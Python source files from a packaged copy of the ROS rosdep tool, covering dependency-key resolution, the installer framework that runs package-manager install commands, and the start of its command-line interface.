depend_graph[rosdep_key]['dependencies'] = list(dependencies)
while dependencies:
depend_rosdep_key = dependencies.pop()
# prevent infinite loop
if depend_rosdep_key in depend_graph:
continue
installer_key, resolution, more_dependencies = \
self.resolve(depend_rosdep_key, resource_name, installer_context)
dependencies.extend(more_dependencies)
depend_graph[depend_rosdep_key]['installer_key'] = installer_key
depend_graph[depend_rosdep_key]['install_keys'] = list(resolution)
depend_graph[depend_rosdep_key]['dependencies'] = list(more_dependencies)
except ResolutionError as e:
errors[resource_name] = e
except ResourceNotFound as e:
errors[resource_name] = e
try:
# TODO: I really don't like AssertionErrors here; this should be modeled as 'CyclicGraphError'
# or something more explicit. No need to continue if this API errors.
resolutions_flat = depend_graph.get_ordered_dependency_list()
except AssertionError as e:
raise InvalidData('cycle in dependency graph detected: %s' % (e))
except KeyError as e:
raise RosdepInternalError(e)
return resolutions_flat, errors
def resolve(self, rosdep_key, resource_name, installer_context):
"""
Resolve a :class:`RosdepDefinition` for a particular
os/version spec.
:param resource_name: resource (e.g. ROS package) to resolve key within
:param rosdep_key: rosdep key to resolve
:param os_name: OS name to use for resolution
        :param os_version: OS version to use for resolution
:returns: *(installer_key, resolution, dependencies)*, ``(str,
[opaque], [str])``. *resolution* are the system
dependencies for the specified installer. The value is an
opaque list and meant to be interpreted by the
installer. *dependencies* is a list of rosdep keys that the
definition depends on.
:raises: :exc:`ResolutionError` If *rosdep_key* cannot be resolved for *resource_name* in *installer_context*
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be located
"""
os_name, os_version = installer_context.get_os_name_and_version()
view = self.get_rosdep_view_for_resource(resource_name)
if view is None:
raise ResolutionError(rosdep_key, None, os_name, os_version, '[%s] does not have a rosdep view' % (resource_name))
try:
# print("KEYS", view.rosdep_defs.keys())
definition = view.lookup(rosdep_key)
except KeyError:
rd_debug(view)
raise ResolutionError(rosdep_key, None, os_name, os_version, 'Cannot locate rosdep definition for [%s]' % (rosdep_key))
# check cache: the main motivation for the cache is that
# source rosdeps are expensive to resolve
if rosdep_key in self._resolve_cache:
cache_value = self._resolve_cache[rosdep_key]
cache_os_name = cache_value[0]
cache_os_version = cache_value[1]
cache_view_name = cache_value[2]
if (
cache_os_name == os_name and
cache_os_version == os_version and
cache_view_name == view.name
):
return cache_value[3:]
# get the rosdep data for the platform
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise ResolutionError(rosdep_key, definition.data, os_name, os_version, 'Unsupported OS [%s]' % (os_name))
installer_key, rosdep_args_dict = definition.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
# resolve the rosdep data for the platform
try:
installer = installer_context.get_installer(installer_key)
except KeyError:
raise ResolutionError(rosdep_key, definition.data, os_name, os_version, 'Unsupported installer [%s]' % (installer_key))
resolution = installer.resolve(rosdep_args_dict)
dependencies = installer.get_depends(rosdep_args_dict)
# cache value
# the dependencies list is copied to prevent mutation before next cache hit
self._resolve_cache[rosdep_key] = os_name, os_version, view.name, installer_key, resolution, list(dependencies)
return installer_key, resolution, dependencies
def _load_all_views(self, loader):
"""
Load all available view keys. In general, this is equivalent
to loading all stacks on the package path. If
:exc:`InvalidData` errors occur while loading a view,
they will be saved in the *errors* field.
:param loader: override self.loader
:raises: :exc:`RosdepInternalError`
"""
for resource_name in loader.get_loadable_views():
try:
self._load_view_dependencies(resource_name, loader)
except ResourceNotFound as e:
self.errors.append(e)
except InvalidData as e:
self.errors.append(e)
def _load_view_dependencies(self, view_key, loader):
"""
Initialize internal :exc:`RosdepDatabase` on demand. Not
thread-safe.
:param view_key: name of view to load dependencies for.
:raises: :exc:`rospkg.ResourceNotFound` If view cannot be located
        :raises: :exc:`InvalidData` if view's data is invalid
:raises: :exc:`RosdepInternalError`
"""
rd_debug('_load_view_dependencies[%s]' % (view_key))
db = self.rosdep_db
if db.is_loaded(view_key):
return
try:
loader.load_view(view_key, db, verbose=self.verbose)
entry = db.get_view_data(view_key)
rd_debug('_load_view_dependencies[%s]: %s' % (view_key, entry.view_dependencies))
for d in entry.view_dependencies:
self._load_view_dependencies(d, loader)
except InvalidData:
# mark view as loaded: as we are caching, the valid
# behavior is to not attempt loading this view ever
# again.
db.mark_loaded(view_key)
# re-raise
raise
except KeyError as e:
raise RosdepInternalError(e)
def create_rosdep_view(self, view_name, view_keys, verbose=False):
"""
:param view_name: name of view to create
:param view_keys: order list of view names to merge, first one wins
:param verbose: print debugging output
"""
# Create view and initialize with dbs from all of the
# dependencies.
view = RosdepView(view_name)
db = self.rosdep_db
for view_key in view_keys:
db_entry = db.get_view_data(view_key)
view.merge(db_entry, verbose=verbose)
if verbose:
print('View [%s], merged views:\n' % (view_name) + '\n'.join([' * %s' % view_key for view_key in view_keys]), file=sys.stderr)
return view
def get_rosdep_view_for_resource(self, resource_name, verbose=False):
"""
Get a :class:`RosdepView` for a specific ROS resource *resource_name*.
Views can be queries to resolve rosdep keys to
definitions.
:param resource_name: Name of ROS resource (e.g. stack,
package) to create view for, ``str``.
:returns: :class:`RosdepView` for specific ROS resource
*resource_name*, or ``None`` if no view is associated with this resource.
:raises: :exc:`RosdepConflict` if view cannot be created due
to conflict rosdep definitions.
:raises: :exc:`rospkg.ResourceNotFound` if *view_key* cannot be located
:raises: :exc:`RosdepInternalError`
"""
view_key = self.loader.get_view_key(resource_name)
if not view_key:
# NOTE: this may not be the right behavior and this happens
# for packages that are not in a stack.
return None
return self.get_rosdep_view(view_key, verbose=verbose)
def get_rosdep_view(self, view_key, verbose=False):
"""
Get a :class:`RosdepView` associated with *view_key*. Views
can be queries to resolve rosdep keys to definitions.
:param view_key: Name of rosdep view (e.g. ROS stack name), ``str``
:raises: :exc:`RosdepConflict` if view cannot be created due
to conflict rosdep definitions.
:raises: :exc:`rospkg.ResourceNotFound` if *view_key* cannot be located
:raises: :exc:`RosdepInternalError`
"""
if view_key in self._view_cache:
return self._view_cache[view_key]
# lazy-init
self._load_view_dependencies(view_key, self.loader)
# use dependencies to create view
try:
dependencies = self.rosdep_db.get_view_dependencies(view_key)
except KeyError as e:
# convert to ResourceNotFound. This should be decoupled
# in the future
raise ResourceNotFound(str(e.args[0]))
# load views in order
view = self.create_rosdep_view(view_key, dependencies + [view_key], verbose=verbose)
self._view_cache[view_key] = view
return view
def get_views_that_define(self, rosdep_name):
"""
Locate all views that directly define *rosdep_name*. A
side-effect of this method is that all available rosdep files
in the configuration will be loaded into memory.
Error state from single-stack failures
        (e.g. :exc:`InvalidData`, :exc:`ResourceNotFound`) is
not propagated. Caller must check
:meth:`RosdepLookup.get_errors` to check for single-stack
error state. Error state does not reset -- it accumulates.
:param rosdep_name: name of rosdep to lookup
:returns: list of (stack_name, origin) where rosdep is defined.
:raises: :exc:`RosdepInternalError`
"""
# TODOXXX: change this to return errors object so that caller cannot ignore
self._load_all_views(self.loader)
db = self.rosdep_db
retval = []
for view_name in db.get_view_names():
entry = db.get_view_data(view_name)
# not much abstraction in the entry object
if rosdep_name in entry.rosdep_data:
retval.append((view_name, entry.origin))
return retval | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/lookup.py | lookup.py |
# Author Tully Foote/[email protected], Ken Conley/[email protected]
from __future__ import print_function
import os
import subprocess
import traceback
from rospkg.os_detect import OsDetect
from .core import rd_debug, RosdepInternalError, InstallFailed, print_bold, InvalidData
# kwc: InstallerContext is basically just a bunch of dictionaries with
# defined lookup methods. It really encompasses two facets of a
# rosdep configuration: the pluggable nature of installers and
# platforms, as well as the resolution of the operating system for a
# specific machine. It is possible to decouple those two notions,
# though there are some touch points over how this interfaces with the
# rospkg.os_detect library, i.e. how platforms can tweak these
# detectors and how the higher-level APIs can override them.
class InstallerContext(object):
"""
:class:`InstallerContext` manages the context of execution for rosdep as it
relates to the installers, OS detectors, and other extensible
APIs.
"""
def __init__(self, os_detect=None):
"""
:param os_detect: (optional)
:class:`rospkg.os_detect.OsDetect` instance to use for
detecting platforms. If `None`, default instance will be
used.
"""
# platform configuration
self.installers = {}
self.os_installers = {}
self.default_os_installer = {}
# stores configuration of which value to use for the OS version key (version number or codename)
self.os_version_type = {}
# OS detection and override
if os_detect is None:
os_detect = OsDetect()
self.os_detect = os_detect
self.os_override = None
self.verbose = False
def set_verbose(self, verbose):
self.verbose = verbose
def set_os_override(self, os_name, os_version):
"""
Override the OS detector with *os_name* and *os_version*. See
:meth:`InstallerContext.detect_os`.
:param os_name: OS name value to use, ``str``
:param os_version: OS version value to use, ``str``
"""
if self.verbose:
print('overriding OS to [%s:%s]' % (os_name, os_version))
self.os_override = os_name, os_version
def get_os_version_type(self, os_name):
return self.os_version_type.get(os_name, OsDetect.get_version)
def set_os_version_type(self, os_name, version_type):
if not hasattr(version_type, '__call__'):
raise ValueError('version type should be a method')
self.os_version_type[os_name] = version_type
def get_os_name_and_version(self):
"""
Get the OS name and version key to use for resolution and
installation. This will be the detected OS name/version
unless :meth:`InstallerContext.set_os_override()` has been
called.
:returns: (os_name, os_version), ``(str, str)``
"""
if self.os_override:
return self.os_override
else:
os_name = self.os_detect.get_name()
os_key = self.get_os_version_type(os_name)
os_version = os_key(self.os_detect)
return os_name, os_version
def get_os_detect(self):
"""
:returns os_detect: :class:`OsDetect` instance used for
detecting platforms.
"""
return self.os_detect
def set_installer(self, installer_key, installer):
"""
Set the installer to use for *installer_key*. This will
replace any existing installer associated with the key.
*installer_key* should be the same key used for the
``rosdep.yaml`` package manager key. If *installer* is
``None``, this will delete any existing associated installer
from this context.
:param installer_key: key/name to associate with installer, ``str``
:param installer: :class:`Installer` implementation, ``class``.
:raises: :exc:`TypeError` if *installer* is not a subclass of
:class:`Installer`
"""
if installer is None:
del self.installers[installer_key]
return
if not isinstance(installer, Installer):
raise TypeError('installer must be a instance of Installer')
if self.verbose:
print('registering installer [%s]' % (installer_key))
self.installers[installer_key] = installer
def get_installer(self, installer_key):
"""
:returns: :class:`Installer` class associated with *installer_key*.
:raises: :exc:`KeyError` If not associated installer
:raises: :exc:`InstallFailed` If installer cannot produce an install command (e.g. if installer is not installed)
"""
return self.installers[installer_key]
def get_installer_keys(self):
"""
:returns: list of registered installer keys
"""
return self.installers.keys()
def get_os_keys(self):
"""
:returns: list of OS keys that have registered with this context, ``[str]``
"""
return self.os_installers.keys()
def add_os_installer_key(self, os_key, installer_key):
"""
Register an installer for the specified OS. This will fail
with a :exc:`KeyError` if no :class:`Installer` can be found
with the associated *installer_key*.
:param os_key: Key for OS
:param installer_key: Key for installer to add to OS
:raises: :exc:`KeyError`: if installer for *installer_key*
is not set.
"""
# validate, will throw KeyError
self.get_installer(installer_key)
if self.verbose:
print('add installer [%s] to OS [%s]' % (installer_key, os_key))
if os_key in self.os_installers:
self.os_installers[os_key].append(installer_key)
else:
self.os_installers[os_key] = [installer_key]
def get_os_installer_keys(self, os_key):
"""
Get list of installer keys registered for the specified OS.
These keys can be resolved by calling
:meth:`InstallerContext.get_installer`.
:param os_key: Key for OS
:raises: :exc:`KeyError`: if no information for OS *os_key* is registered.
"""
if os_key in self.os_installers:
return self.os_installers[os_key][:]
else:
raise KeyError(os_key)
def set_default_os_installer_key(self, os_key, installer_key):
"""
Set the default OS installer to use for OS.
:meth:`InstallerContext.add_os_installer` must have previously
been called with the same arguments.
:param os_key: Key for OS
:param installer_key: Key for installer to add to OS
:raises: :exc:`KeyError`: if installer for *installer_key*
is not set or if OS for *os_key* has no associated installers.
"""
if os_key not in self.os_installers:
raise KeyError('unknown OS: %s' % (os_key))
if not hasattr(installer_key, '__call__'):
            raise ValueError('installer key should be a callable')
if not installer_key(self.os_detect) in self.os_installers[os_key]:
raise KeyError('installer [%s] is not associated with OS [%s]. call add_os_installer_key() first' % (installer_key(self.os_detect), os_key))
if self.verbose:
print('set default installer [%s] for OS [%s]' % (installer_key(self.os_detect), os_key,))
self.default_os_installer[os_key] = installer_key
def get_default_os_installer_key(self, os_key):
"""
Get the default OS installer key to use for OS, or ``None`` if
there is no default.
:param os_key: Key for OS
:returns: :class:`Installer`
:raises: :exc:`KeyError`: if no information for OS *os_key* is registered.
"""
if os_key not in self.os_installers:
raise KeyError('unknown OS: %s' % (os_key))
try:
installer_key = self.default_os_installer[os_key](self.os_detect)
if installer_key not in self.os_installers[os_key]:
raise KeyError('installer [%s] is not associated with OS [%s]. call add_os_installer_key() first' % (installer_key, os_key))
# validate, will throw KeyError
self.get_installer(installer_key)
return installer_key
except KeyError:
return None
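# Illustrative sketch of wiring up an InstallerContext by hand (normally this is done by
# create_default_installer_context(); 'apt' and my_apt_installer are placeholders):
#
#     context = InstallerContext()
#     context.set_installer('apt', my_apt_installer)  # my_apt_installer: an Installer instance
#     context.add_os_installer_key('ubuntu', 'apt')
#     context.set_default_os_installer_key('ubuntu', lambda os_detect: 'apt')
#     os_name, os_version = context.get_os_name_and_version()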
class Installer(object):
"""
The :class:`Installer` API is designed around opaque *resolved*
parameters. These parameters can be any type of sequence object,
but they must obey set arithmetic. They should also implement
``__str__()`` methods so they can be pretty printed.
"""
def is_installed(self, resolved_item):
"""
:param resolved: resolved installation item. NOTE: this is a single item,
not a list of items like the other APIs, ``opaque``.
:returns: ``True`` if all of the *resolved* items are installed on
the local system
"""
raise NotImplementedError('is_installed', resolved_item)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
"""
:param resolved: list of resolved installation items, ``[opaque]``
:param interactive: If `False`, disable interactive prompts,
          e.g. Pass through ``-y`` or equivalent to the package manager.
:param reinstall: If `True`, install everything even if already installed
"""
raise NotImplementedError('get_package_install_command', resolved, interactive, reinstall, quiet)
def get_depends(self, rosdep_args):
"""
:returns: list of dependencies on other rosdep keys. Only
necessary if the package manager doesn't handle
dependencies.
"""
return [] # Default return empty list
def resolve(self, rosdep_args_dict):
"""
:param rosdep_args_dict: argument dictionary to the rosdep rule for this package manager
:returns: [resolutions]. resolved objects should be printable to a user, but are otherwise opaque.
"""
raise NotImplementedError('Base class resolve', rosdep_args_dict)
def unique(self, *resolved_rules):
"""
Combine the resolved rules into a unique list. This
is meant to combine the results of multiple calls to
:meth:`PackageManagerInstaller.resolve`.
Example::
resolved1 = installer.resolve(args1)
resolved2 = installer.resolve(args2)
resolved = installer.unique(resolved1, resolved2)
:param resolved_rules: resolved arguments. Resolved
arguments must all be from this :class:`Installer` instance.
"""
raise NotImplementedError('Base class unique', resolved_rules)
class PackageManagerInstaller(Installer):
"""
General form of a package manager :class:`Installer`
implementation that assumes:
- installer rosdep args spec is a list of package names stored with the key "packages"
- a detect function exists that can return a list of packages that are installed
Also, if *supports_depends* is set to ``True``:
- installer rosdep args spec can also include dependency specification with the key "depends"
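    Example of such a rosdep args spec (illustrative; the package names are placeholders)::
        {'packages': ['libfoo-dev', 'libbar-dev'],
         'depends': ['foo']}  # 'depends' is only honoured when supports_depends is True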
"""
def __init__(self, detect_fn, supports_depends=False):
"""
:param supports_depends: package manager supports dependency key
:param detect_fn: function that for a given list of packages determines
the list of installed packages.
"""
self.detect_fn = detect_fn
self.supports_depends = supports_depends
self.as_root = True
self.sudo_command = 'sudo -H' if os.geteuid() != 0 else ''
def elevate_priv(self, cmd):
"""
Prepend *self.sudo_command* to the command if *self.as_root* is ``True``.
:param list cmd: list of strings comprising the command
:returns: a list of commands
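        Example (illustrative)::
            elevate_priv(['apt-get', 'install', 'libfoo-dev'])
            # -> ['sudo', '-H', 'apt-get', 'install', 'libfoo-dev'] when as_root is True
            #    and the current user is not root; the command is returned unchanged otherwise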
"""
return (self.sudo_command.split() if self.as_root else []) + cmd
def resolve(self, rosdep_args):
"""
See :meth:`Installer.resolve()`
"""
packages = None
if type(rosdep_args) == dict:
packages = rosdep_args.get('packages', [])
if isinstance(packages, str):
packages = packages.split()
elif isinstance(rosdep_args, str):
packages = rosdep_args.split(' ')
elif type(rosdep_args) == list:
packages = rosdep_args
else:
raise InvalidData('Invalid rosdep args: %s' % (rosdep_args))
return packages
def unique(self, *resolved_rules):
"""
See :meth:`Installer.unique()`
"""
s = set()
for resolved in resolved_rules:
s.update(resolved)
return sorted(list(s))
def get_packages_to_install(self, resolved, reinstall=False):
"""
Return a list of packages (out of *resolved*) that still need to get
installed.
"""
if reinstall:
return resolved
if not resolved:
return []
else:
detected = self.detect_fn(resolved)
return [x for x in resolved if x not in detected]
def is_installed(self, resolved_item):
"""
Check if a given package was installed.
"""
return not self.get_packages_to_install([resolved_item])
def get_version_strings(self):
"""
Return a list of version information strings.
Where each string is of the form "<installer> <version string>".
For example, ["apt-get x.y.z"] or ["pip x.y.z", "setuptools x.y.z"].
"""
raise NotImplementedError('subclasses must implement get_version_strings method')
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raise NotImplementedError('subclasses must implement', resolved, interactive, reinstall, quiet)
def get_depends(self, rosdep_args):
"""
:returns: list of dependencies on other rosdep keys. Only
necessary if the package manager doesn't handle
dependencies.
"""
if self.supports_depends and type(rosdep_args) == dict:
return rosdep_args.get('depends', [])
return [] # Default return empty list
def normalize_uninstalled_to_list(uninstalled):
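    # Flatten the [(installer_key, resolved), ...] pairs produced by get_uninstalled() into a
    # flat list of package-name strings, e.g. (illustrative)
    # [('apt', ['libfoo-dev']), ('pip', 'bar')] -> ['libfoo-dev', 'bar'].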
uninstalled_dependencies = []
for pkg_or_list in [v for k, v in uninstalled]:
if isinstance(pkg_or_list, list):
for pkg in pkg_or_list:
uninstalled_dependencies.append(str(pkg))
else:
            uninstalled_dependencies.append(str(pkg_or_list))
return uninstalled_dependencies
class RosdepInstaller(object):
def __init__(self, installer_context, lookup):
self.installer_context = installer_context
self.lookup = lookup
def get_uninstalled(self, resources, implicit=False, verbose=False):
"""
Get list of system dependencies that have not been installed
as well as a list of errors from performing the resolution.
This is a bulk API in order to provide performance
optimizations in checking install state.
:param resources: List of resource names (e.g. ROS package names), ``[str]]``
:param implicit: Install implicit (recursive) dependencies of
resources. Default ``False``.
:returns: (uninstalled, errors), ``({str: [opaque]}, {str: ResolutionError})``.
Uninstalled is a dictionary with the installer_key as the key.
:raises: :exc:`RosdepInternalError`
"""
installer_context = self.installer_context
# resolutions have been unique()d
if verbose:
print('resolving for resources [%s]' % (', '.join(resources)))
resolutions, errors = self.lookup.resolve_all(resources, installer_context, implicit=implicit)
# for each installer, figure out what is left to install
uninstalled = []
if resolutions == []:
return uninstalled, errors
for installer_key, resolved in resolutions: # py3k
if verbose:
print('resolution: %s [%s]' % (installer_key, ', '.join([str(r) for r in resolved])))
try:
installer = installer_context.get_installer(installer_key)
except KeyError as e: # lookup has to be buggy to cause this
raise RosdepInternalError(e)
try:
packages_to_install = installer.get_packages_to_install(resolved)
except Exception as e:
rd_debug(traceback.format_exc())
raise RosdepInternalError(e, message='Bad installer [%s]: %s' % (installer_key, e))
# only create key if there is something to do
if packages_to_install:
uninstalled.append((installer_key, packages_to_install))
if verbose:
print('uninstalled: [%s]' % (', '.join([str(p) for p in packages_to_install])))
return uninstalled, errors
def install(self, uninstalled, interactive=True, simulate=False,
continue_on_error=False, reinstall=False, verbose=False, quiet=False):
"""
Install the uninstalled rosdeps. This API is for the bulk
workflow of rosdep (see example below). For a more targeted
install API, see :meth:`RosdepInstaller.install_resolved`.
:param uninstalled: uninstalled value from
:meth:`RosdepInstaller.get_uninstalled`. Value is a
dictionary mapping installer key to a dictionary with resolution
data, ``{str: {str: vals}}``
:param interactive: If ``False``, suppress
interactive prompts (e.g. by passing '-y' to ``apt``).
        :param simulate: If ``True``, simulate installation
without actually executing.
:param continue_on_error: If ``True``, continue installation
even if an install fails. Otherwise, stop after first
installation failure.
        :param reinstall: If ``True``, install dependencies even if
            already installed (default ``False``).
:raises: :exc:`InstallFailed` if any rosdeps fail to install
and *continue_on_error* is ``False``.
:raises: :exc:`KeyError` If *uninstalled* value has invalid
installer keys
Example::
uninstalled, errors = installer.get_uninstalled(packages)
installer.install(uninstalled)
"""
if verbose:
print(
'install options: reinstall[%s] simulate[%s] interactive[%s]' %
(reinstall, simulate, interactive)
)
uninstalled_list = normalize_uninstalled_to_list(uninstalled)
print('install: uninstalled keys are %s' % ', '.join(uninstalled_list))
# Squash uninstalled again, in case some dependencies were already installed
squashed_uninstalled = []
previous_installer_key = None
for installer_key, resolved in uninstalled:
if previous_installer_key != installer_key:
squashed_uninstalled.append((installer_key, []))
previous_installer_key = installer_key
squashed_uninstalled[-1][1].extend(resolved)
failures = []
for installer_key, resolved in squashed_uninstalled:
try:
self.install_resolved(installer_key, resolved, simulate=simulate,
interactive=interactive, reinstall=reinstall, continue_on_error=continue_on_error,
verbose=verbose, quiet=quiet)
except InstallFailed as e:
if not continue_on_error:
raise
else:
# accumulate errors
failures.extend(e.failures)
if failures:
raise InstallFailed(failures=failures)
def install_resolved(self, installer_key, resolved, simulate=False, interactive=True,
reinstall=False, continue_on_error=False, verbose=False, quiet=False):
"""
Lower-level API for installing a rosdep dependency. The
rosdep keys have already been resolved to *installer_key* and
*resolved* via :exc:`RosdepLookup` or other means.
:param installer_key: Key for installer to apply to *resolved*, ``str``
:param resolved: Opaque resolution list from :class:`RosdepLookup`.
:param interactive: If ``True``, allow interactive prompts (default ``True``)
:param simulate: If ``True``, don't execute installation commands, just print to screen.
        :param reinstall: If ``True``, install dependencies even if
            already installed (default ``False``).
:param verbose: If ``True``, print verbose output to screen (default ``False``)
        :param quiet: If ``True``, suppress output except for errors (default ``False``)
:raises: :exc:`InstallFailed` if any of *resolved* fail to install.
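        Example (sketch; the installer key and the *resolved* values are
        platform-specific and shown here only for illustration)::
            installer.install_resolved('apt', resolved, simulate=True, verbose=True)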
"""
installer_context = self.installer_context
installer = installer_context.get_installer(installer_key)
command = installer.get_install_command(resolved, interactive=interactive, reinstall=reinstall, quiet=quiet)
if not command:
if verbose:
print('#No packages to install')
return
if simulate:
print('#[%s] Installation commands:' % (installer_key))
for sub_command in command:
if isinstance(sub_command[0], list):
sub_cmd_len = len(sub_command)
for i, cmd in enumerate(sub_command):
print(" '%s' (alternative %d/%d)" % (' '.join(cmd), i + 1, sub_cmd_len))
else:
print(' ' + ' '.join(sub_command))
# nothing left to do for simulation
if simulate:
return
def run_command(command, installer_key, failures, verbose):
# always echo commands to screen
print_bold('executing command [%s]' % ' '.join(command))
result = subprocess.call(command)
if verbose:
print('command return code [%s]: %s' % (' '.join(command), result))
if result != 0:
failures.append((installer_key, 'command [%s] failed' % (' '.join(command))))
return result
# run each install command set and collect errors
failures = []
for sub_command in command:
if isinstance(sub_command[0], list): # list of alternatives
alt_failures = []
for alt_command in sub_command:
result = run_command(alt_command, installer_key, alt_failures, verbose)
                    if result == 0:  # one successful command is sufficient
                        alt_failures = []  # clear failures from other alternatives
break
failures.extend(alt_failures)
else:
result = run_command(sub_command, installer_key, failures, verbose)
if result != 0:
if not continue_on_error:
raise InstallFailed(failures=failures)
# test installation of each
for r in resolved:
if not installer.is_installed(r):
failures.append((installer_key, 'Failed to detect successful installation of [%s]' % (r)))
# finalize result
if failures:
raise InstallFailed(failures=failures)
elif verbose:
print('#successfully installed') | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/installers.py | installers.py |
# Author Tully Foote/[email protected]
"""
Command-line interface to rosdep library
"""
from __future__ import print_function
import errno
import os
import sys
import traceback
try:
from urllib.error import URLError
from urllib.request import build_opener
from urllib.request import HTTPBasicAuthHandler
from urllib.request import HTTPHandler
from urllib.request import install_opener
from urllib.request import ProxyHandler
except ImportError:
from urllib2 import build_opener
from urllib2 import HTTPBasicAuthHandler
from urllib2 import HTTPHandler
from urllib2 import install_opener
from urllib2 import ProxyHandler
from urllib2 import URLError
import warnings
from optparse import OptionParser
import rospkg
from . import create_default_installer_context, get_default_installer
from . import __version__
from .core import RosdepInternalError, InstallFailed, UnsupportedOs, InvalidData, CachePermissionError, DownloadFailure
from .installers import normalize_uninstalled_to_list
from .installers import RosdepInstaller
from .lookup import RosdepLookup, ResolutionError, prune_catkin_packages
from .meta import MetaDatabase
from .rospkg_loader import DEFAULT_VIEW_KEY
from .sources_list import update_sources_list, get_sources_cache_dir,\
download_default_sources_list, SourcesListLoader, CACHE_INDEX,\
get_sources_list_dir, get_default_sources_list_file,\
DEFAULT_SOURCES_LIST_URL
from .rosdistrohelper import PreRep137Warning
from .ament_packages import AMENT_PREFIX_PATH_ENV_VAR
from .ament_packages import get_packages_with_prefixes
from .catkin_packages import find_catkin_packages_in
from .catkin_packages import set_workspace_packages
from .catkin_packages import get_workspace_packages
from .catkin_packages import VALID_DEPENDENCY_TYPES
from catkin_pkg.package import InvalidPackage
class UsageError(Exception):
pass
_usage = """usage: rosdep [options] <command> <args>
Commands:
rosdep check <stacks-and-packages>...
check if the dependencies of package(s) have been met.
rosdep install <stacks-and-packages>...
download and install the dependencies of a given package or packages.
rosdep db
generate the dependency database and print it to the console.
rosdep init
initialize rosdep sources in /etc/ros/rosdep. May require sudo.
rosdep keys <stacks-and-packages>...
list the rosdep keys that the packages depend on.
rosdep resolve <rosdeps>
resolve <rosdeps> to system dependencies
rosdep update
update the local rosdep database based on the rosdep sources.
rosdep what-needs <rosdeps>...
print a list of packages that declare a rosdep on (at least
one of) <rosdeps>
rosdep where-defined <rosdeps>...
print a list of yaml files that declare a rosdep on (at least
one of) <rosdeps>
rosdep fix-permissions
Recursively change the permissions of the user's ros home directory.
May require sudo. Can be useful to fix permissions after calling
"rosdep update" with sudo accidentally.
"""
def _get_default_RosdepLookup(options):
"""
Helper routine for converting command-line options into
appropriate RosdepLookup instance.
"""
os_override = convert_os_override_option(options.os_override)
sources_loader = SourcesListLoader.create_default(sources_cache_dir=options.sources_cache_dir,
os_override=os_override,
verbose=options.verbose)
lookup = RosdepLookup.create_from_rospkg(sources_loader=sources_loader, dependency_types=options.dependency_types)
lookup.verbose = options.verbose
return lookup
def rosdep_main(args=None):
if args is None:
args = sys.argv[1:]
try:
exit_code = _rosdep_main(args)
if exit_code not in [0, None]:
sys.exit(exit_code)
except rospkg.ResourceNotFound as e:
print("""
ERROR: rosdep cannot find all required resources to answer your query
%s
""" % (error_to_human_readable(e)), file=sys.stderr)
sys.exit(1)
except UsageError as e:
print(_usage, file=sys.stderr)
print('ERROR: %s' % (str(e)), file=sys.stderr)
if hasattr(os, 'EX_USAGE'):
sys.exit(os.EX_USAGE)
else:
            sys.exit(64)  # os.EX_USAGE is not defined on Windows; its Unix value is 64
except RosdepInternalError as e:
print("""
ERROR: Rosdep experienced an internal error.
Please go to the rosdep page [1] and file a bug report with the message below.
[1] : http://www.ros.org/wiki/rosdep
rosdep version: %s
%s
""" % (__version__, e.message), file=sys.stderr)
sys.exit(1)
except ResolutionError as e:
print("""
ERROR: %s
%s
""" % (e.args[0], e), file=sys.stderr)
sys.exit(1)
except CachePermissionError as e:
print(str(e))
print("Try running 'sudo rosdep fix-permissions'")
sys.exit(1)
except UnsupportedOs as e:
print('Unsupported OS: %s\nSupported OSes are [%s]' % (e.args[0], ', '.join(e.args[1])), file=sys.stderr)
sys.exit(1)
except InvalidPackage as e:
print(str(e))
sys.exit(1)
except Exception as e:
print("""
ERROR: Rosdep experienced an error: %s
rosdep version: %s
%s
""" % (e, __version__, traceback.format_exc()), file=sys.stderr)
sys.exit(1)
def check_for_sources_list_init(sources_cache_dir):
"""
Check to see if sources list and cache are present.
*sources_cache_dir* alone is enough to pass as the user has the
option of passing in a cache dir.
If check fails, tell user how to resolve and sys exit.
"""
commands = []
filename = os.path.join(sources_cache_dir, CACHE_INDEX)
if os.path.exists(filename):
return
else:
commands.append('rosdep update')
sources_list_dir = get_sources_list_dir()
if not os.path.exists(sources_list_dir):
commands.insert(0, 'sudo rosdep init')
else:
filelist = [f for f in os.listdir(sources_list_dir) if f.endswith('.list')]
if not filelist:
commands.insert(0, 'sudo rosdep init')
if commands:
commands = '\n'.join([' %s' % c for c in commands])
print("""
ERROR: your rosdep installation has not been initialized yet. Please run:
%s
""" % (commands), file=sys.stderr)
sys.exit(1)
else:
return True
def key_list_to_dict(key_list):
"""
Convert a list of strings of the form 'foo:bar' to a dictionary.
Splits strings of the form 'foo:bar quux:quax' into separate entries.
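    Example (illustrative values)::
        key_list_to_dict(['pip:false', 'gem:yes homebrew:no'])
        # -> {'pip': 'false', 'gem': 'yes', 'homebrew': 'no'}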
"""
try:
key_list = [key for s in key_list for key in s.split(' ')]
return dict(map(lambda s: [t.strip() for t in s.split(':')], key_list))
except ValueError as e:
raise UsageError("Invalid 'key:value' list: '%s'" % ' '.join(key_list))
def str_to_bool(s):
"""Maps a string to bool. Supports true/false, and yes/no, and is case-insensitive"""
s = s.lower()
if s in ['yes', 'true']:
return True
elif s in ['no', 'false']:
return False
else:
raise UsageError("Cannot parse '%s' as boolean" % s)
def setup_proxy_opener():
    # check for http(s)_proxy environment variables
for scheme in ['http', 'https']:
key = scheme + '_proxy'
if key in os.environ:
proxy = ProxyHandler({scheme: os.environ[key]})
auth = HTTPBasicAuthHandler()
opener = build_opener(proxy, auth, HTTPHandler)
install_opener(opener)
def setup_environment_variables(ros_distro):
"""
Set environment variables needed to find ROS packages and evaluate conditional dependencies.
:param ros_distro: The requested ROS distro passed on the CLI, or None
"""
if ros_distro is not None:
if 'ROS_DISTRO' in os.environ and os.environ['ROS_DISTRO'] != ros_distro:
# user has a different workspace sourced, use --rosdistro
print('WARNING: given --rosdistro {} but ROS_DISTRO is "{}". Ignoring environment.'.format(
ros_distro, os.environ['ROS_DISTRO']))
# Use python version from --rosdistro
if 'ROS_PYTHON_VERSION' in os.environ:
del os.environ['ROS_PYTHON_VERSION']
os.environ['ROS_DISTRO'] = ros_distro
if 'ROS_PYTHON_VERSION' not in os.environ and 'ROS_DISTRO' in os.environ:
# Set python version to version used by ROS distro
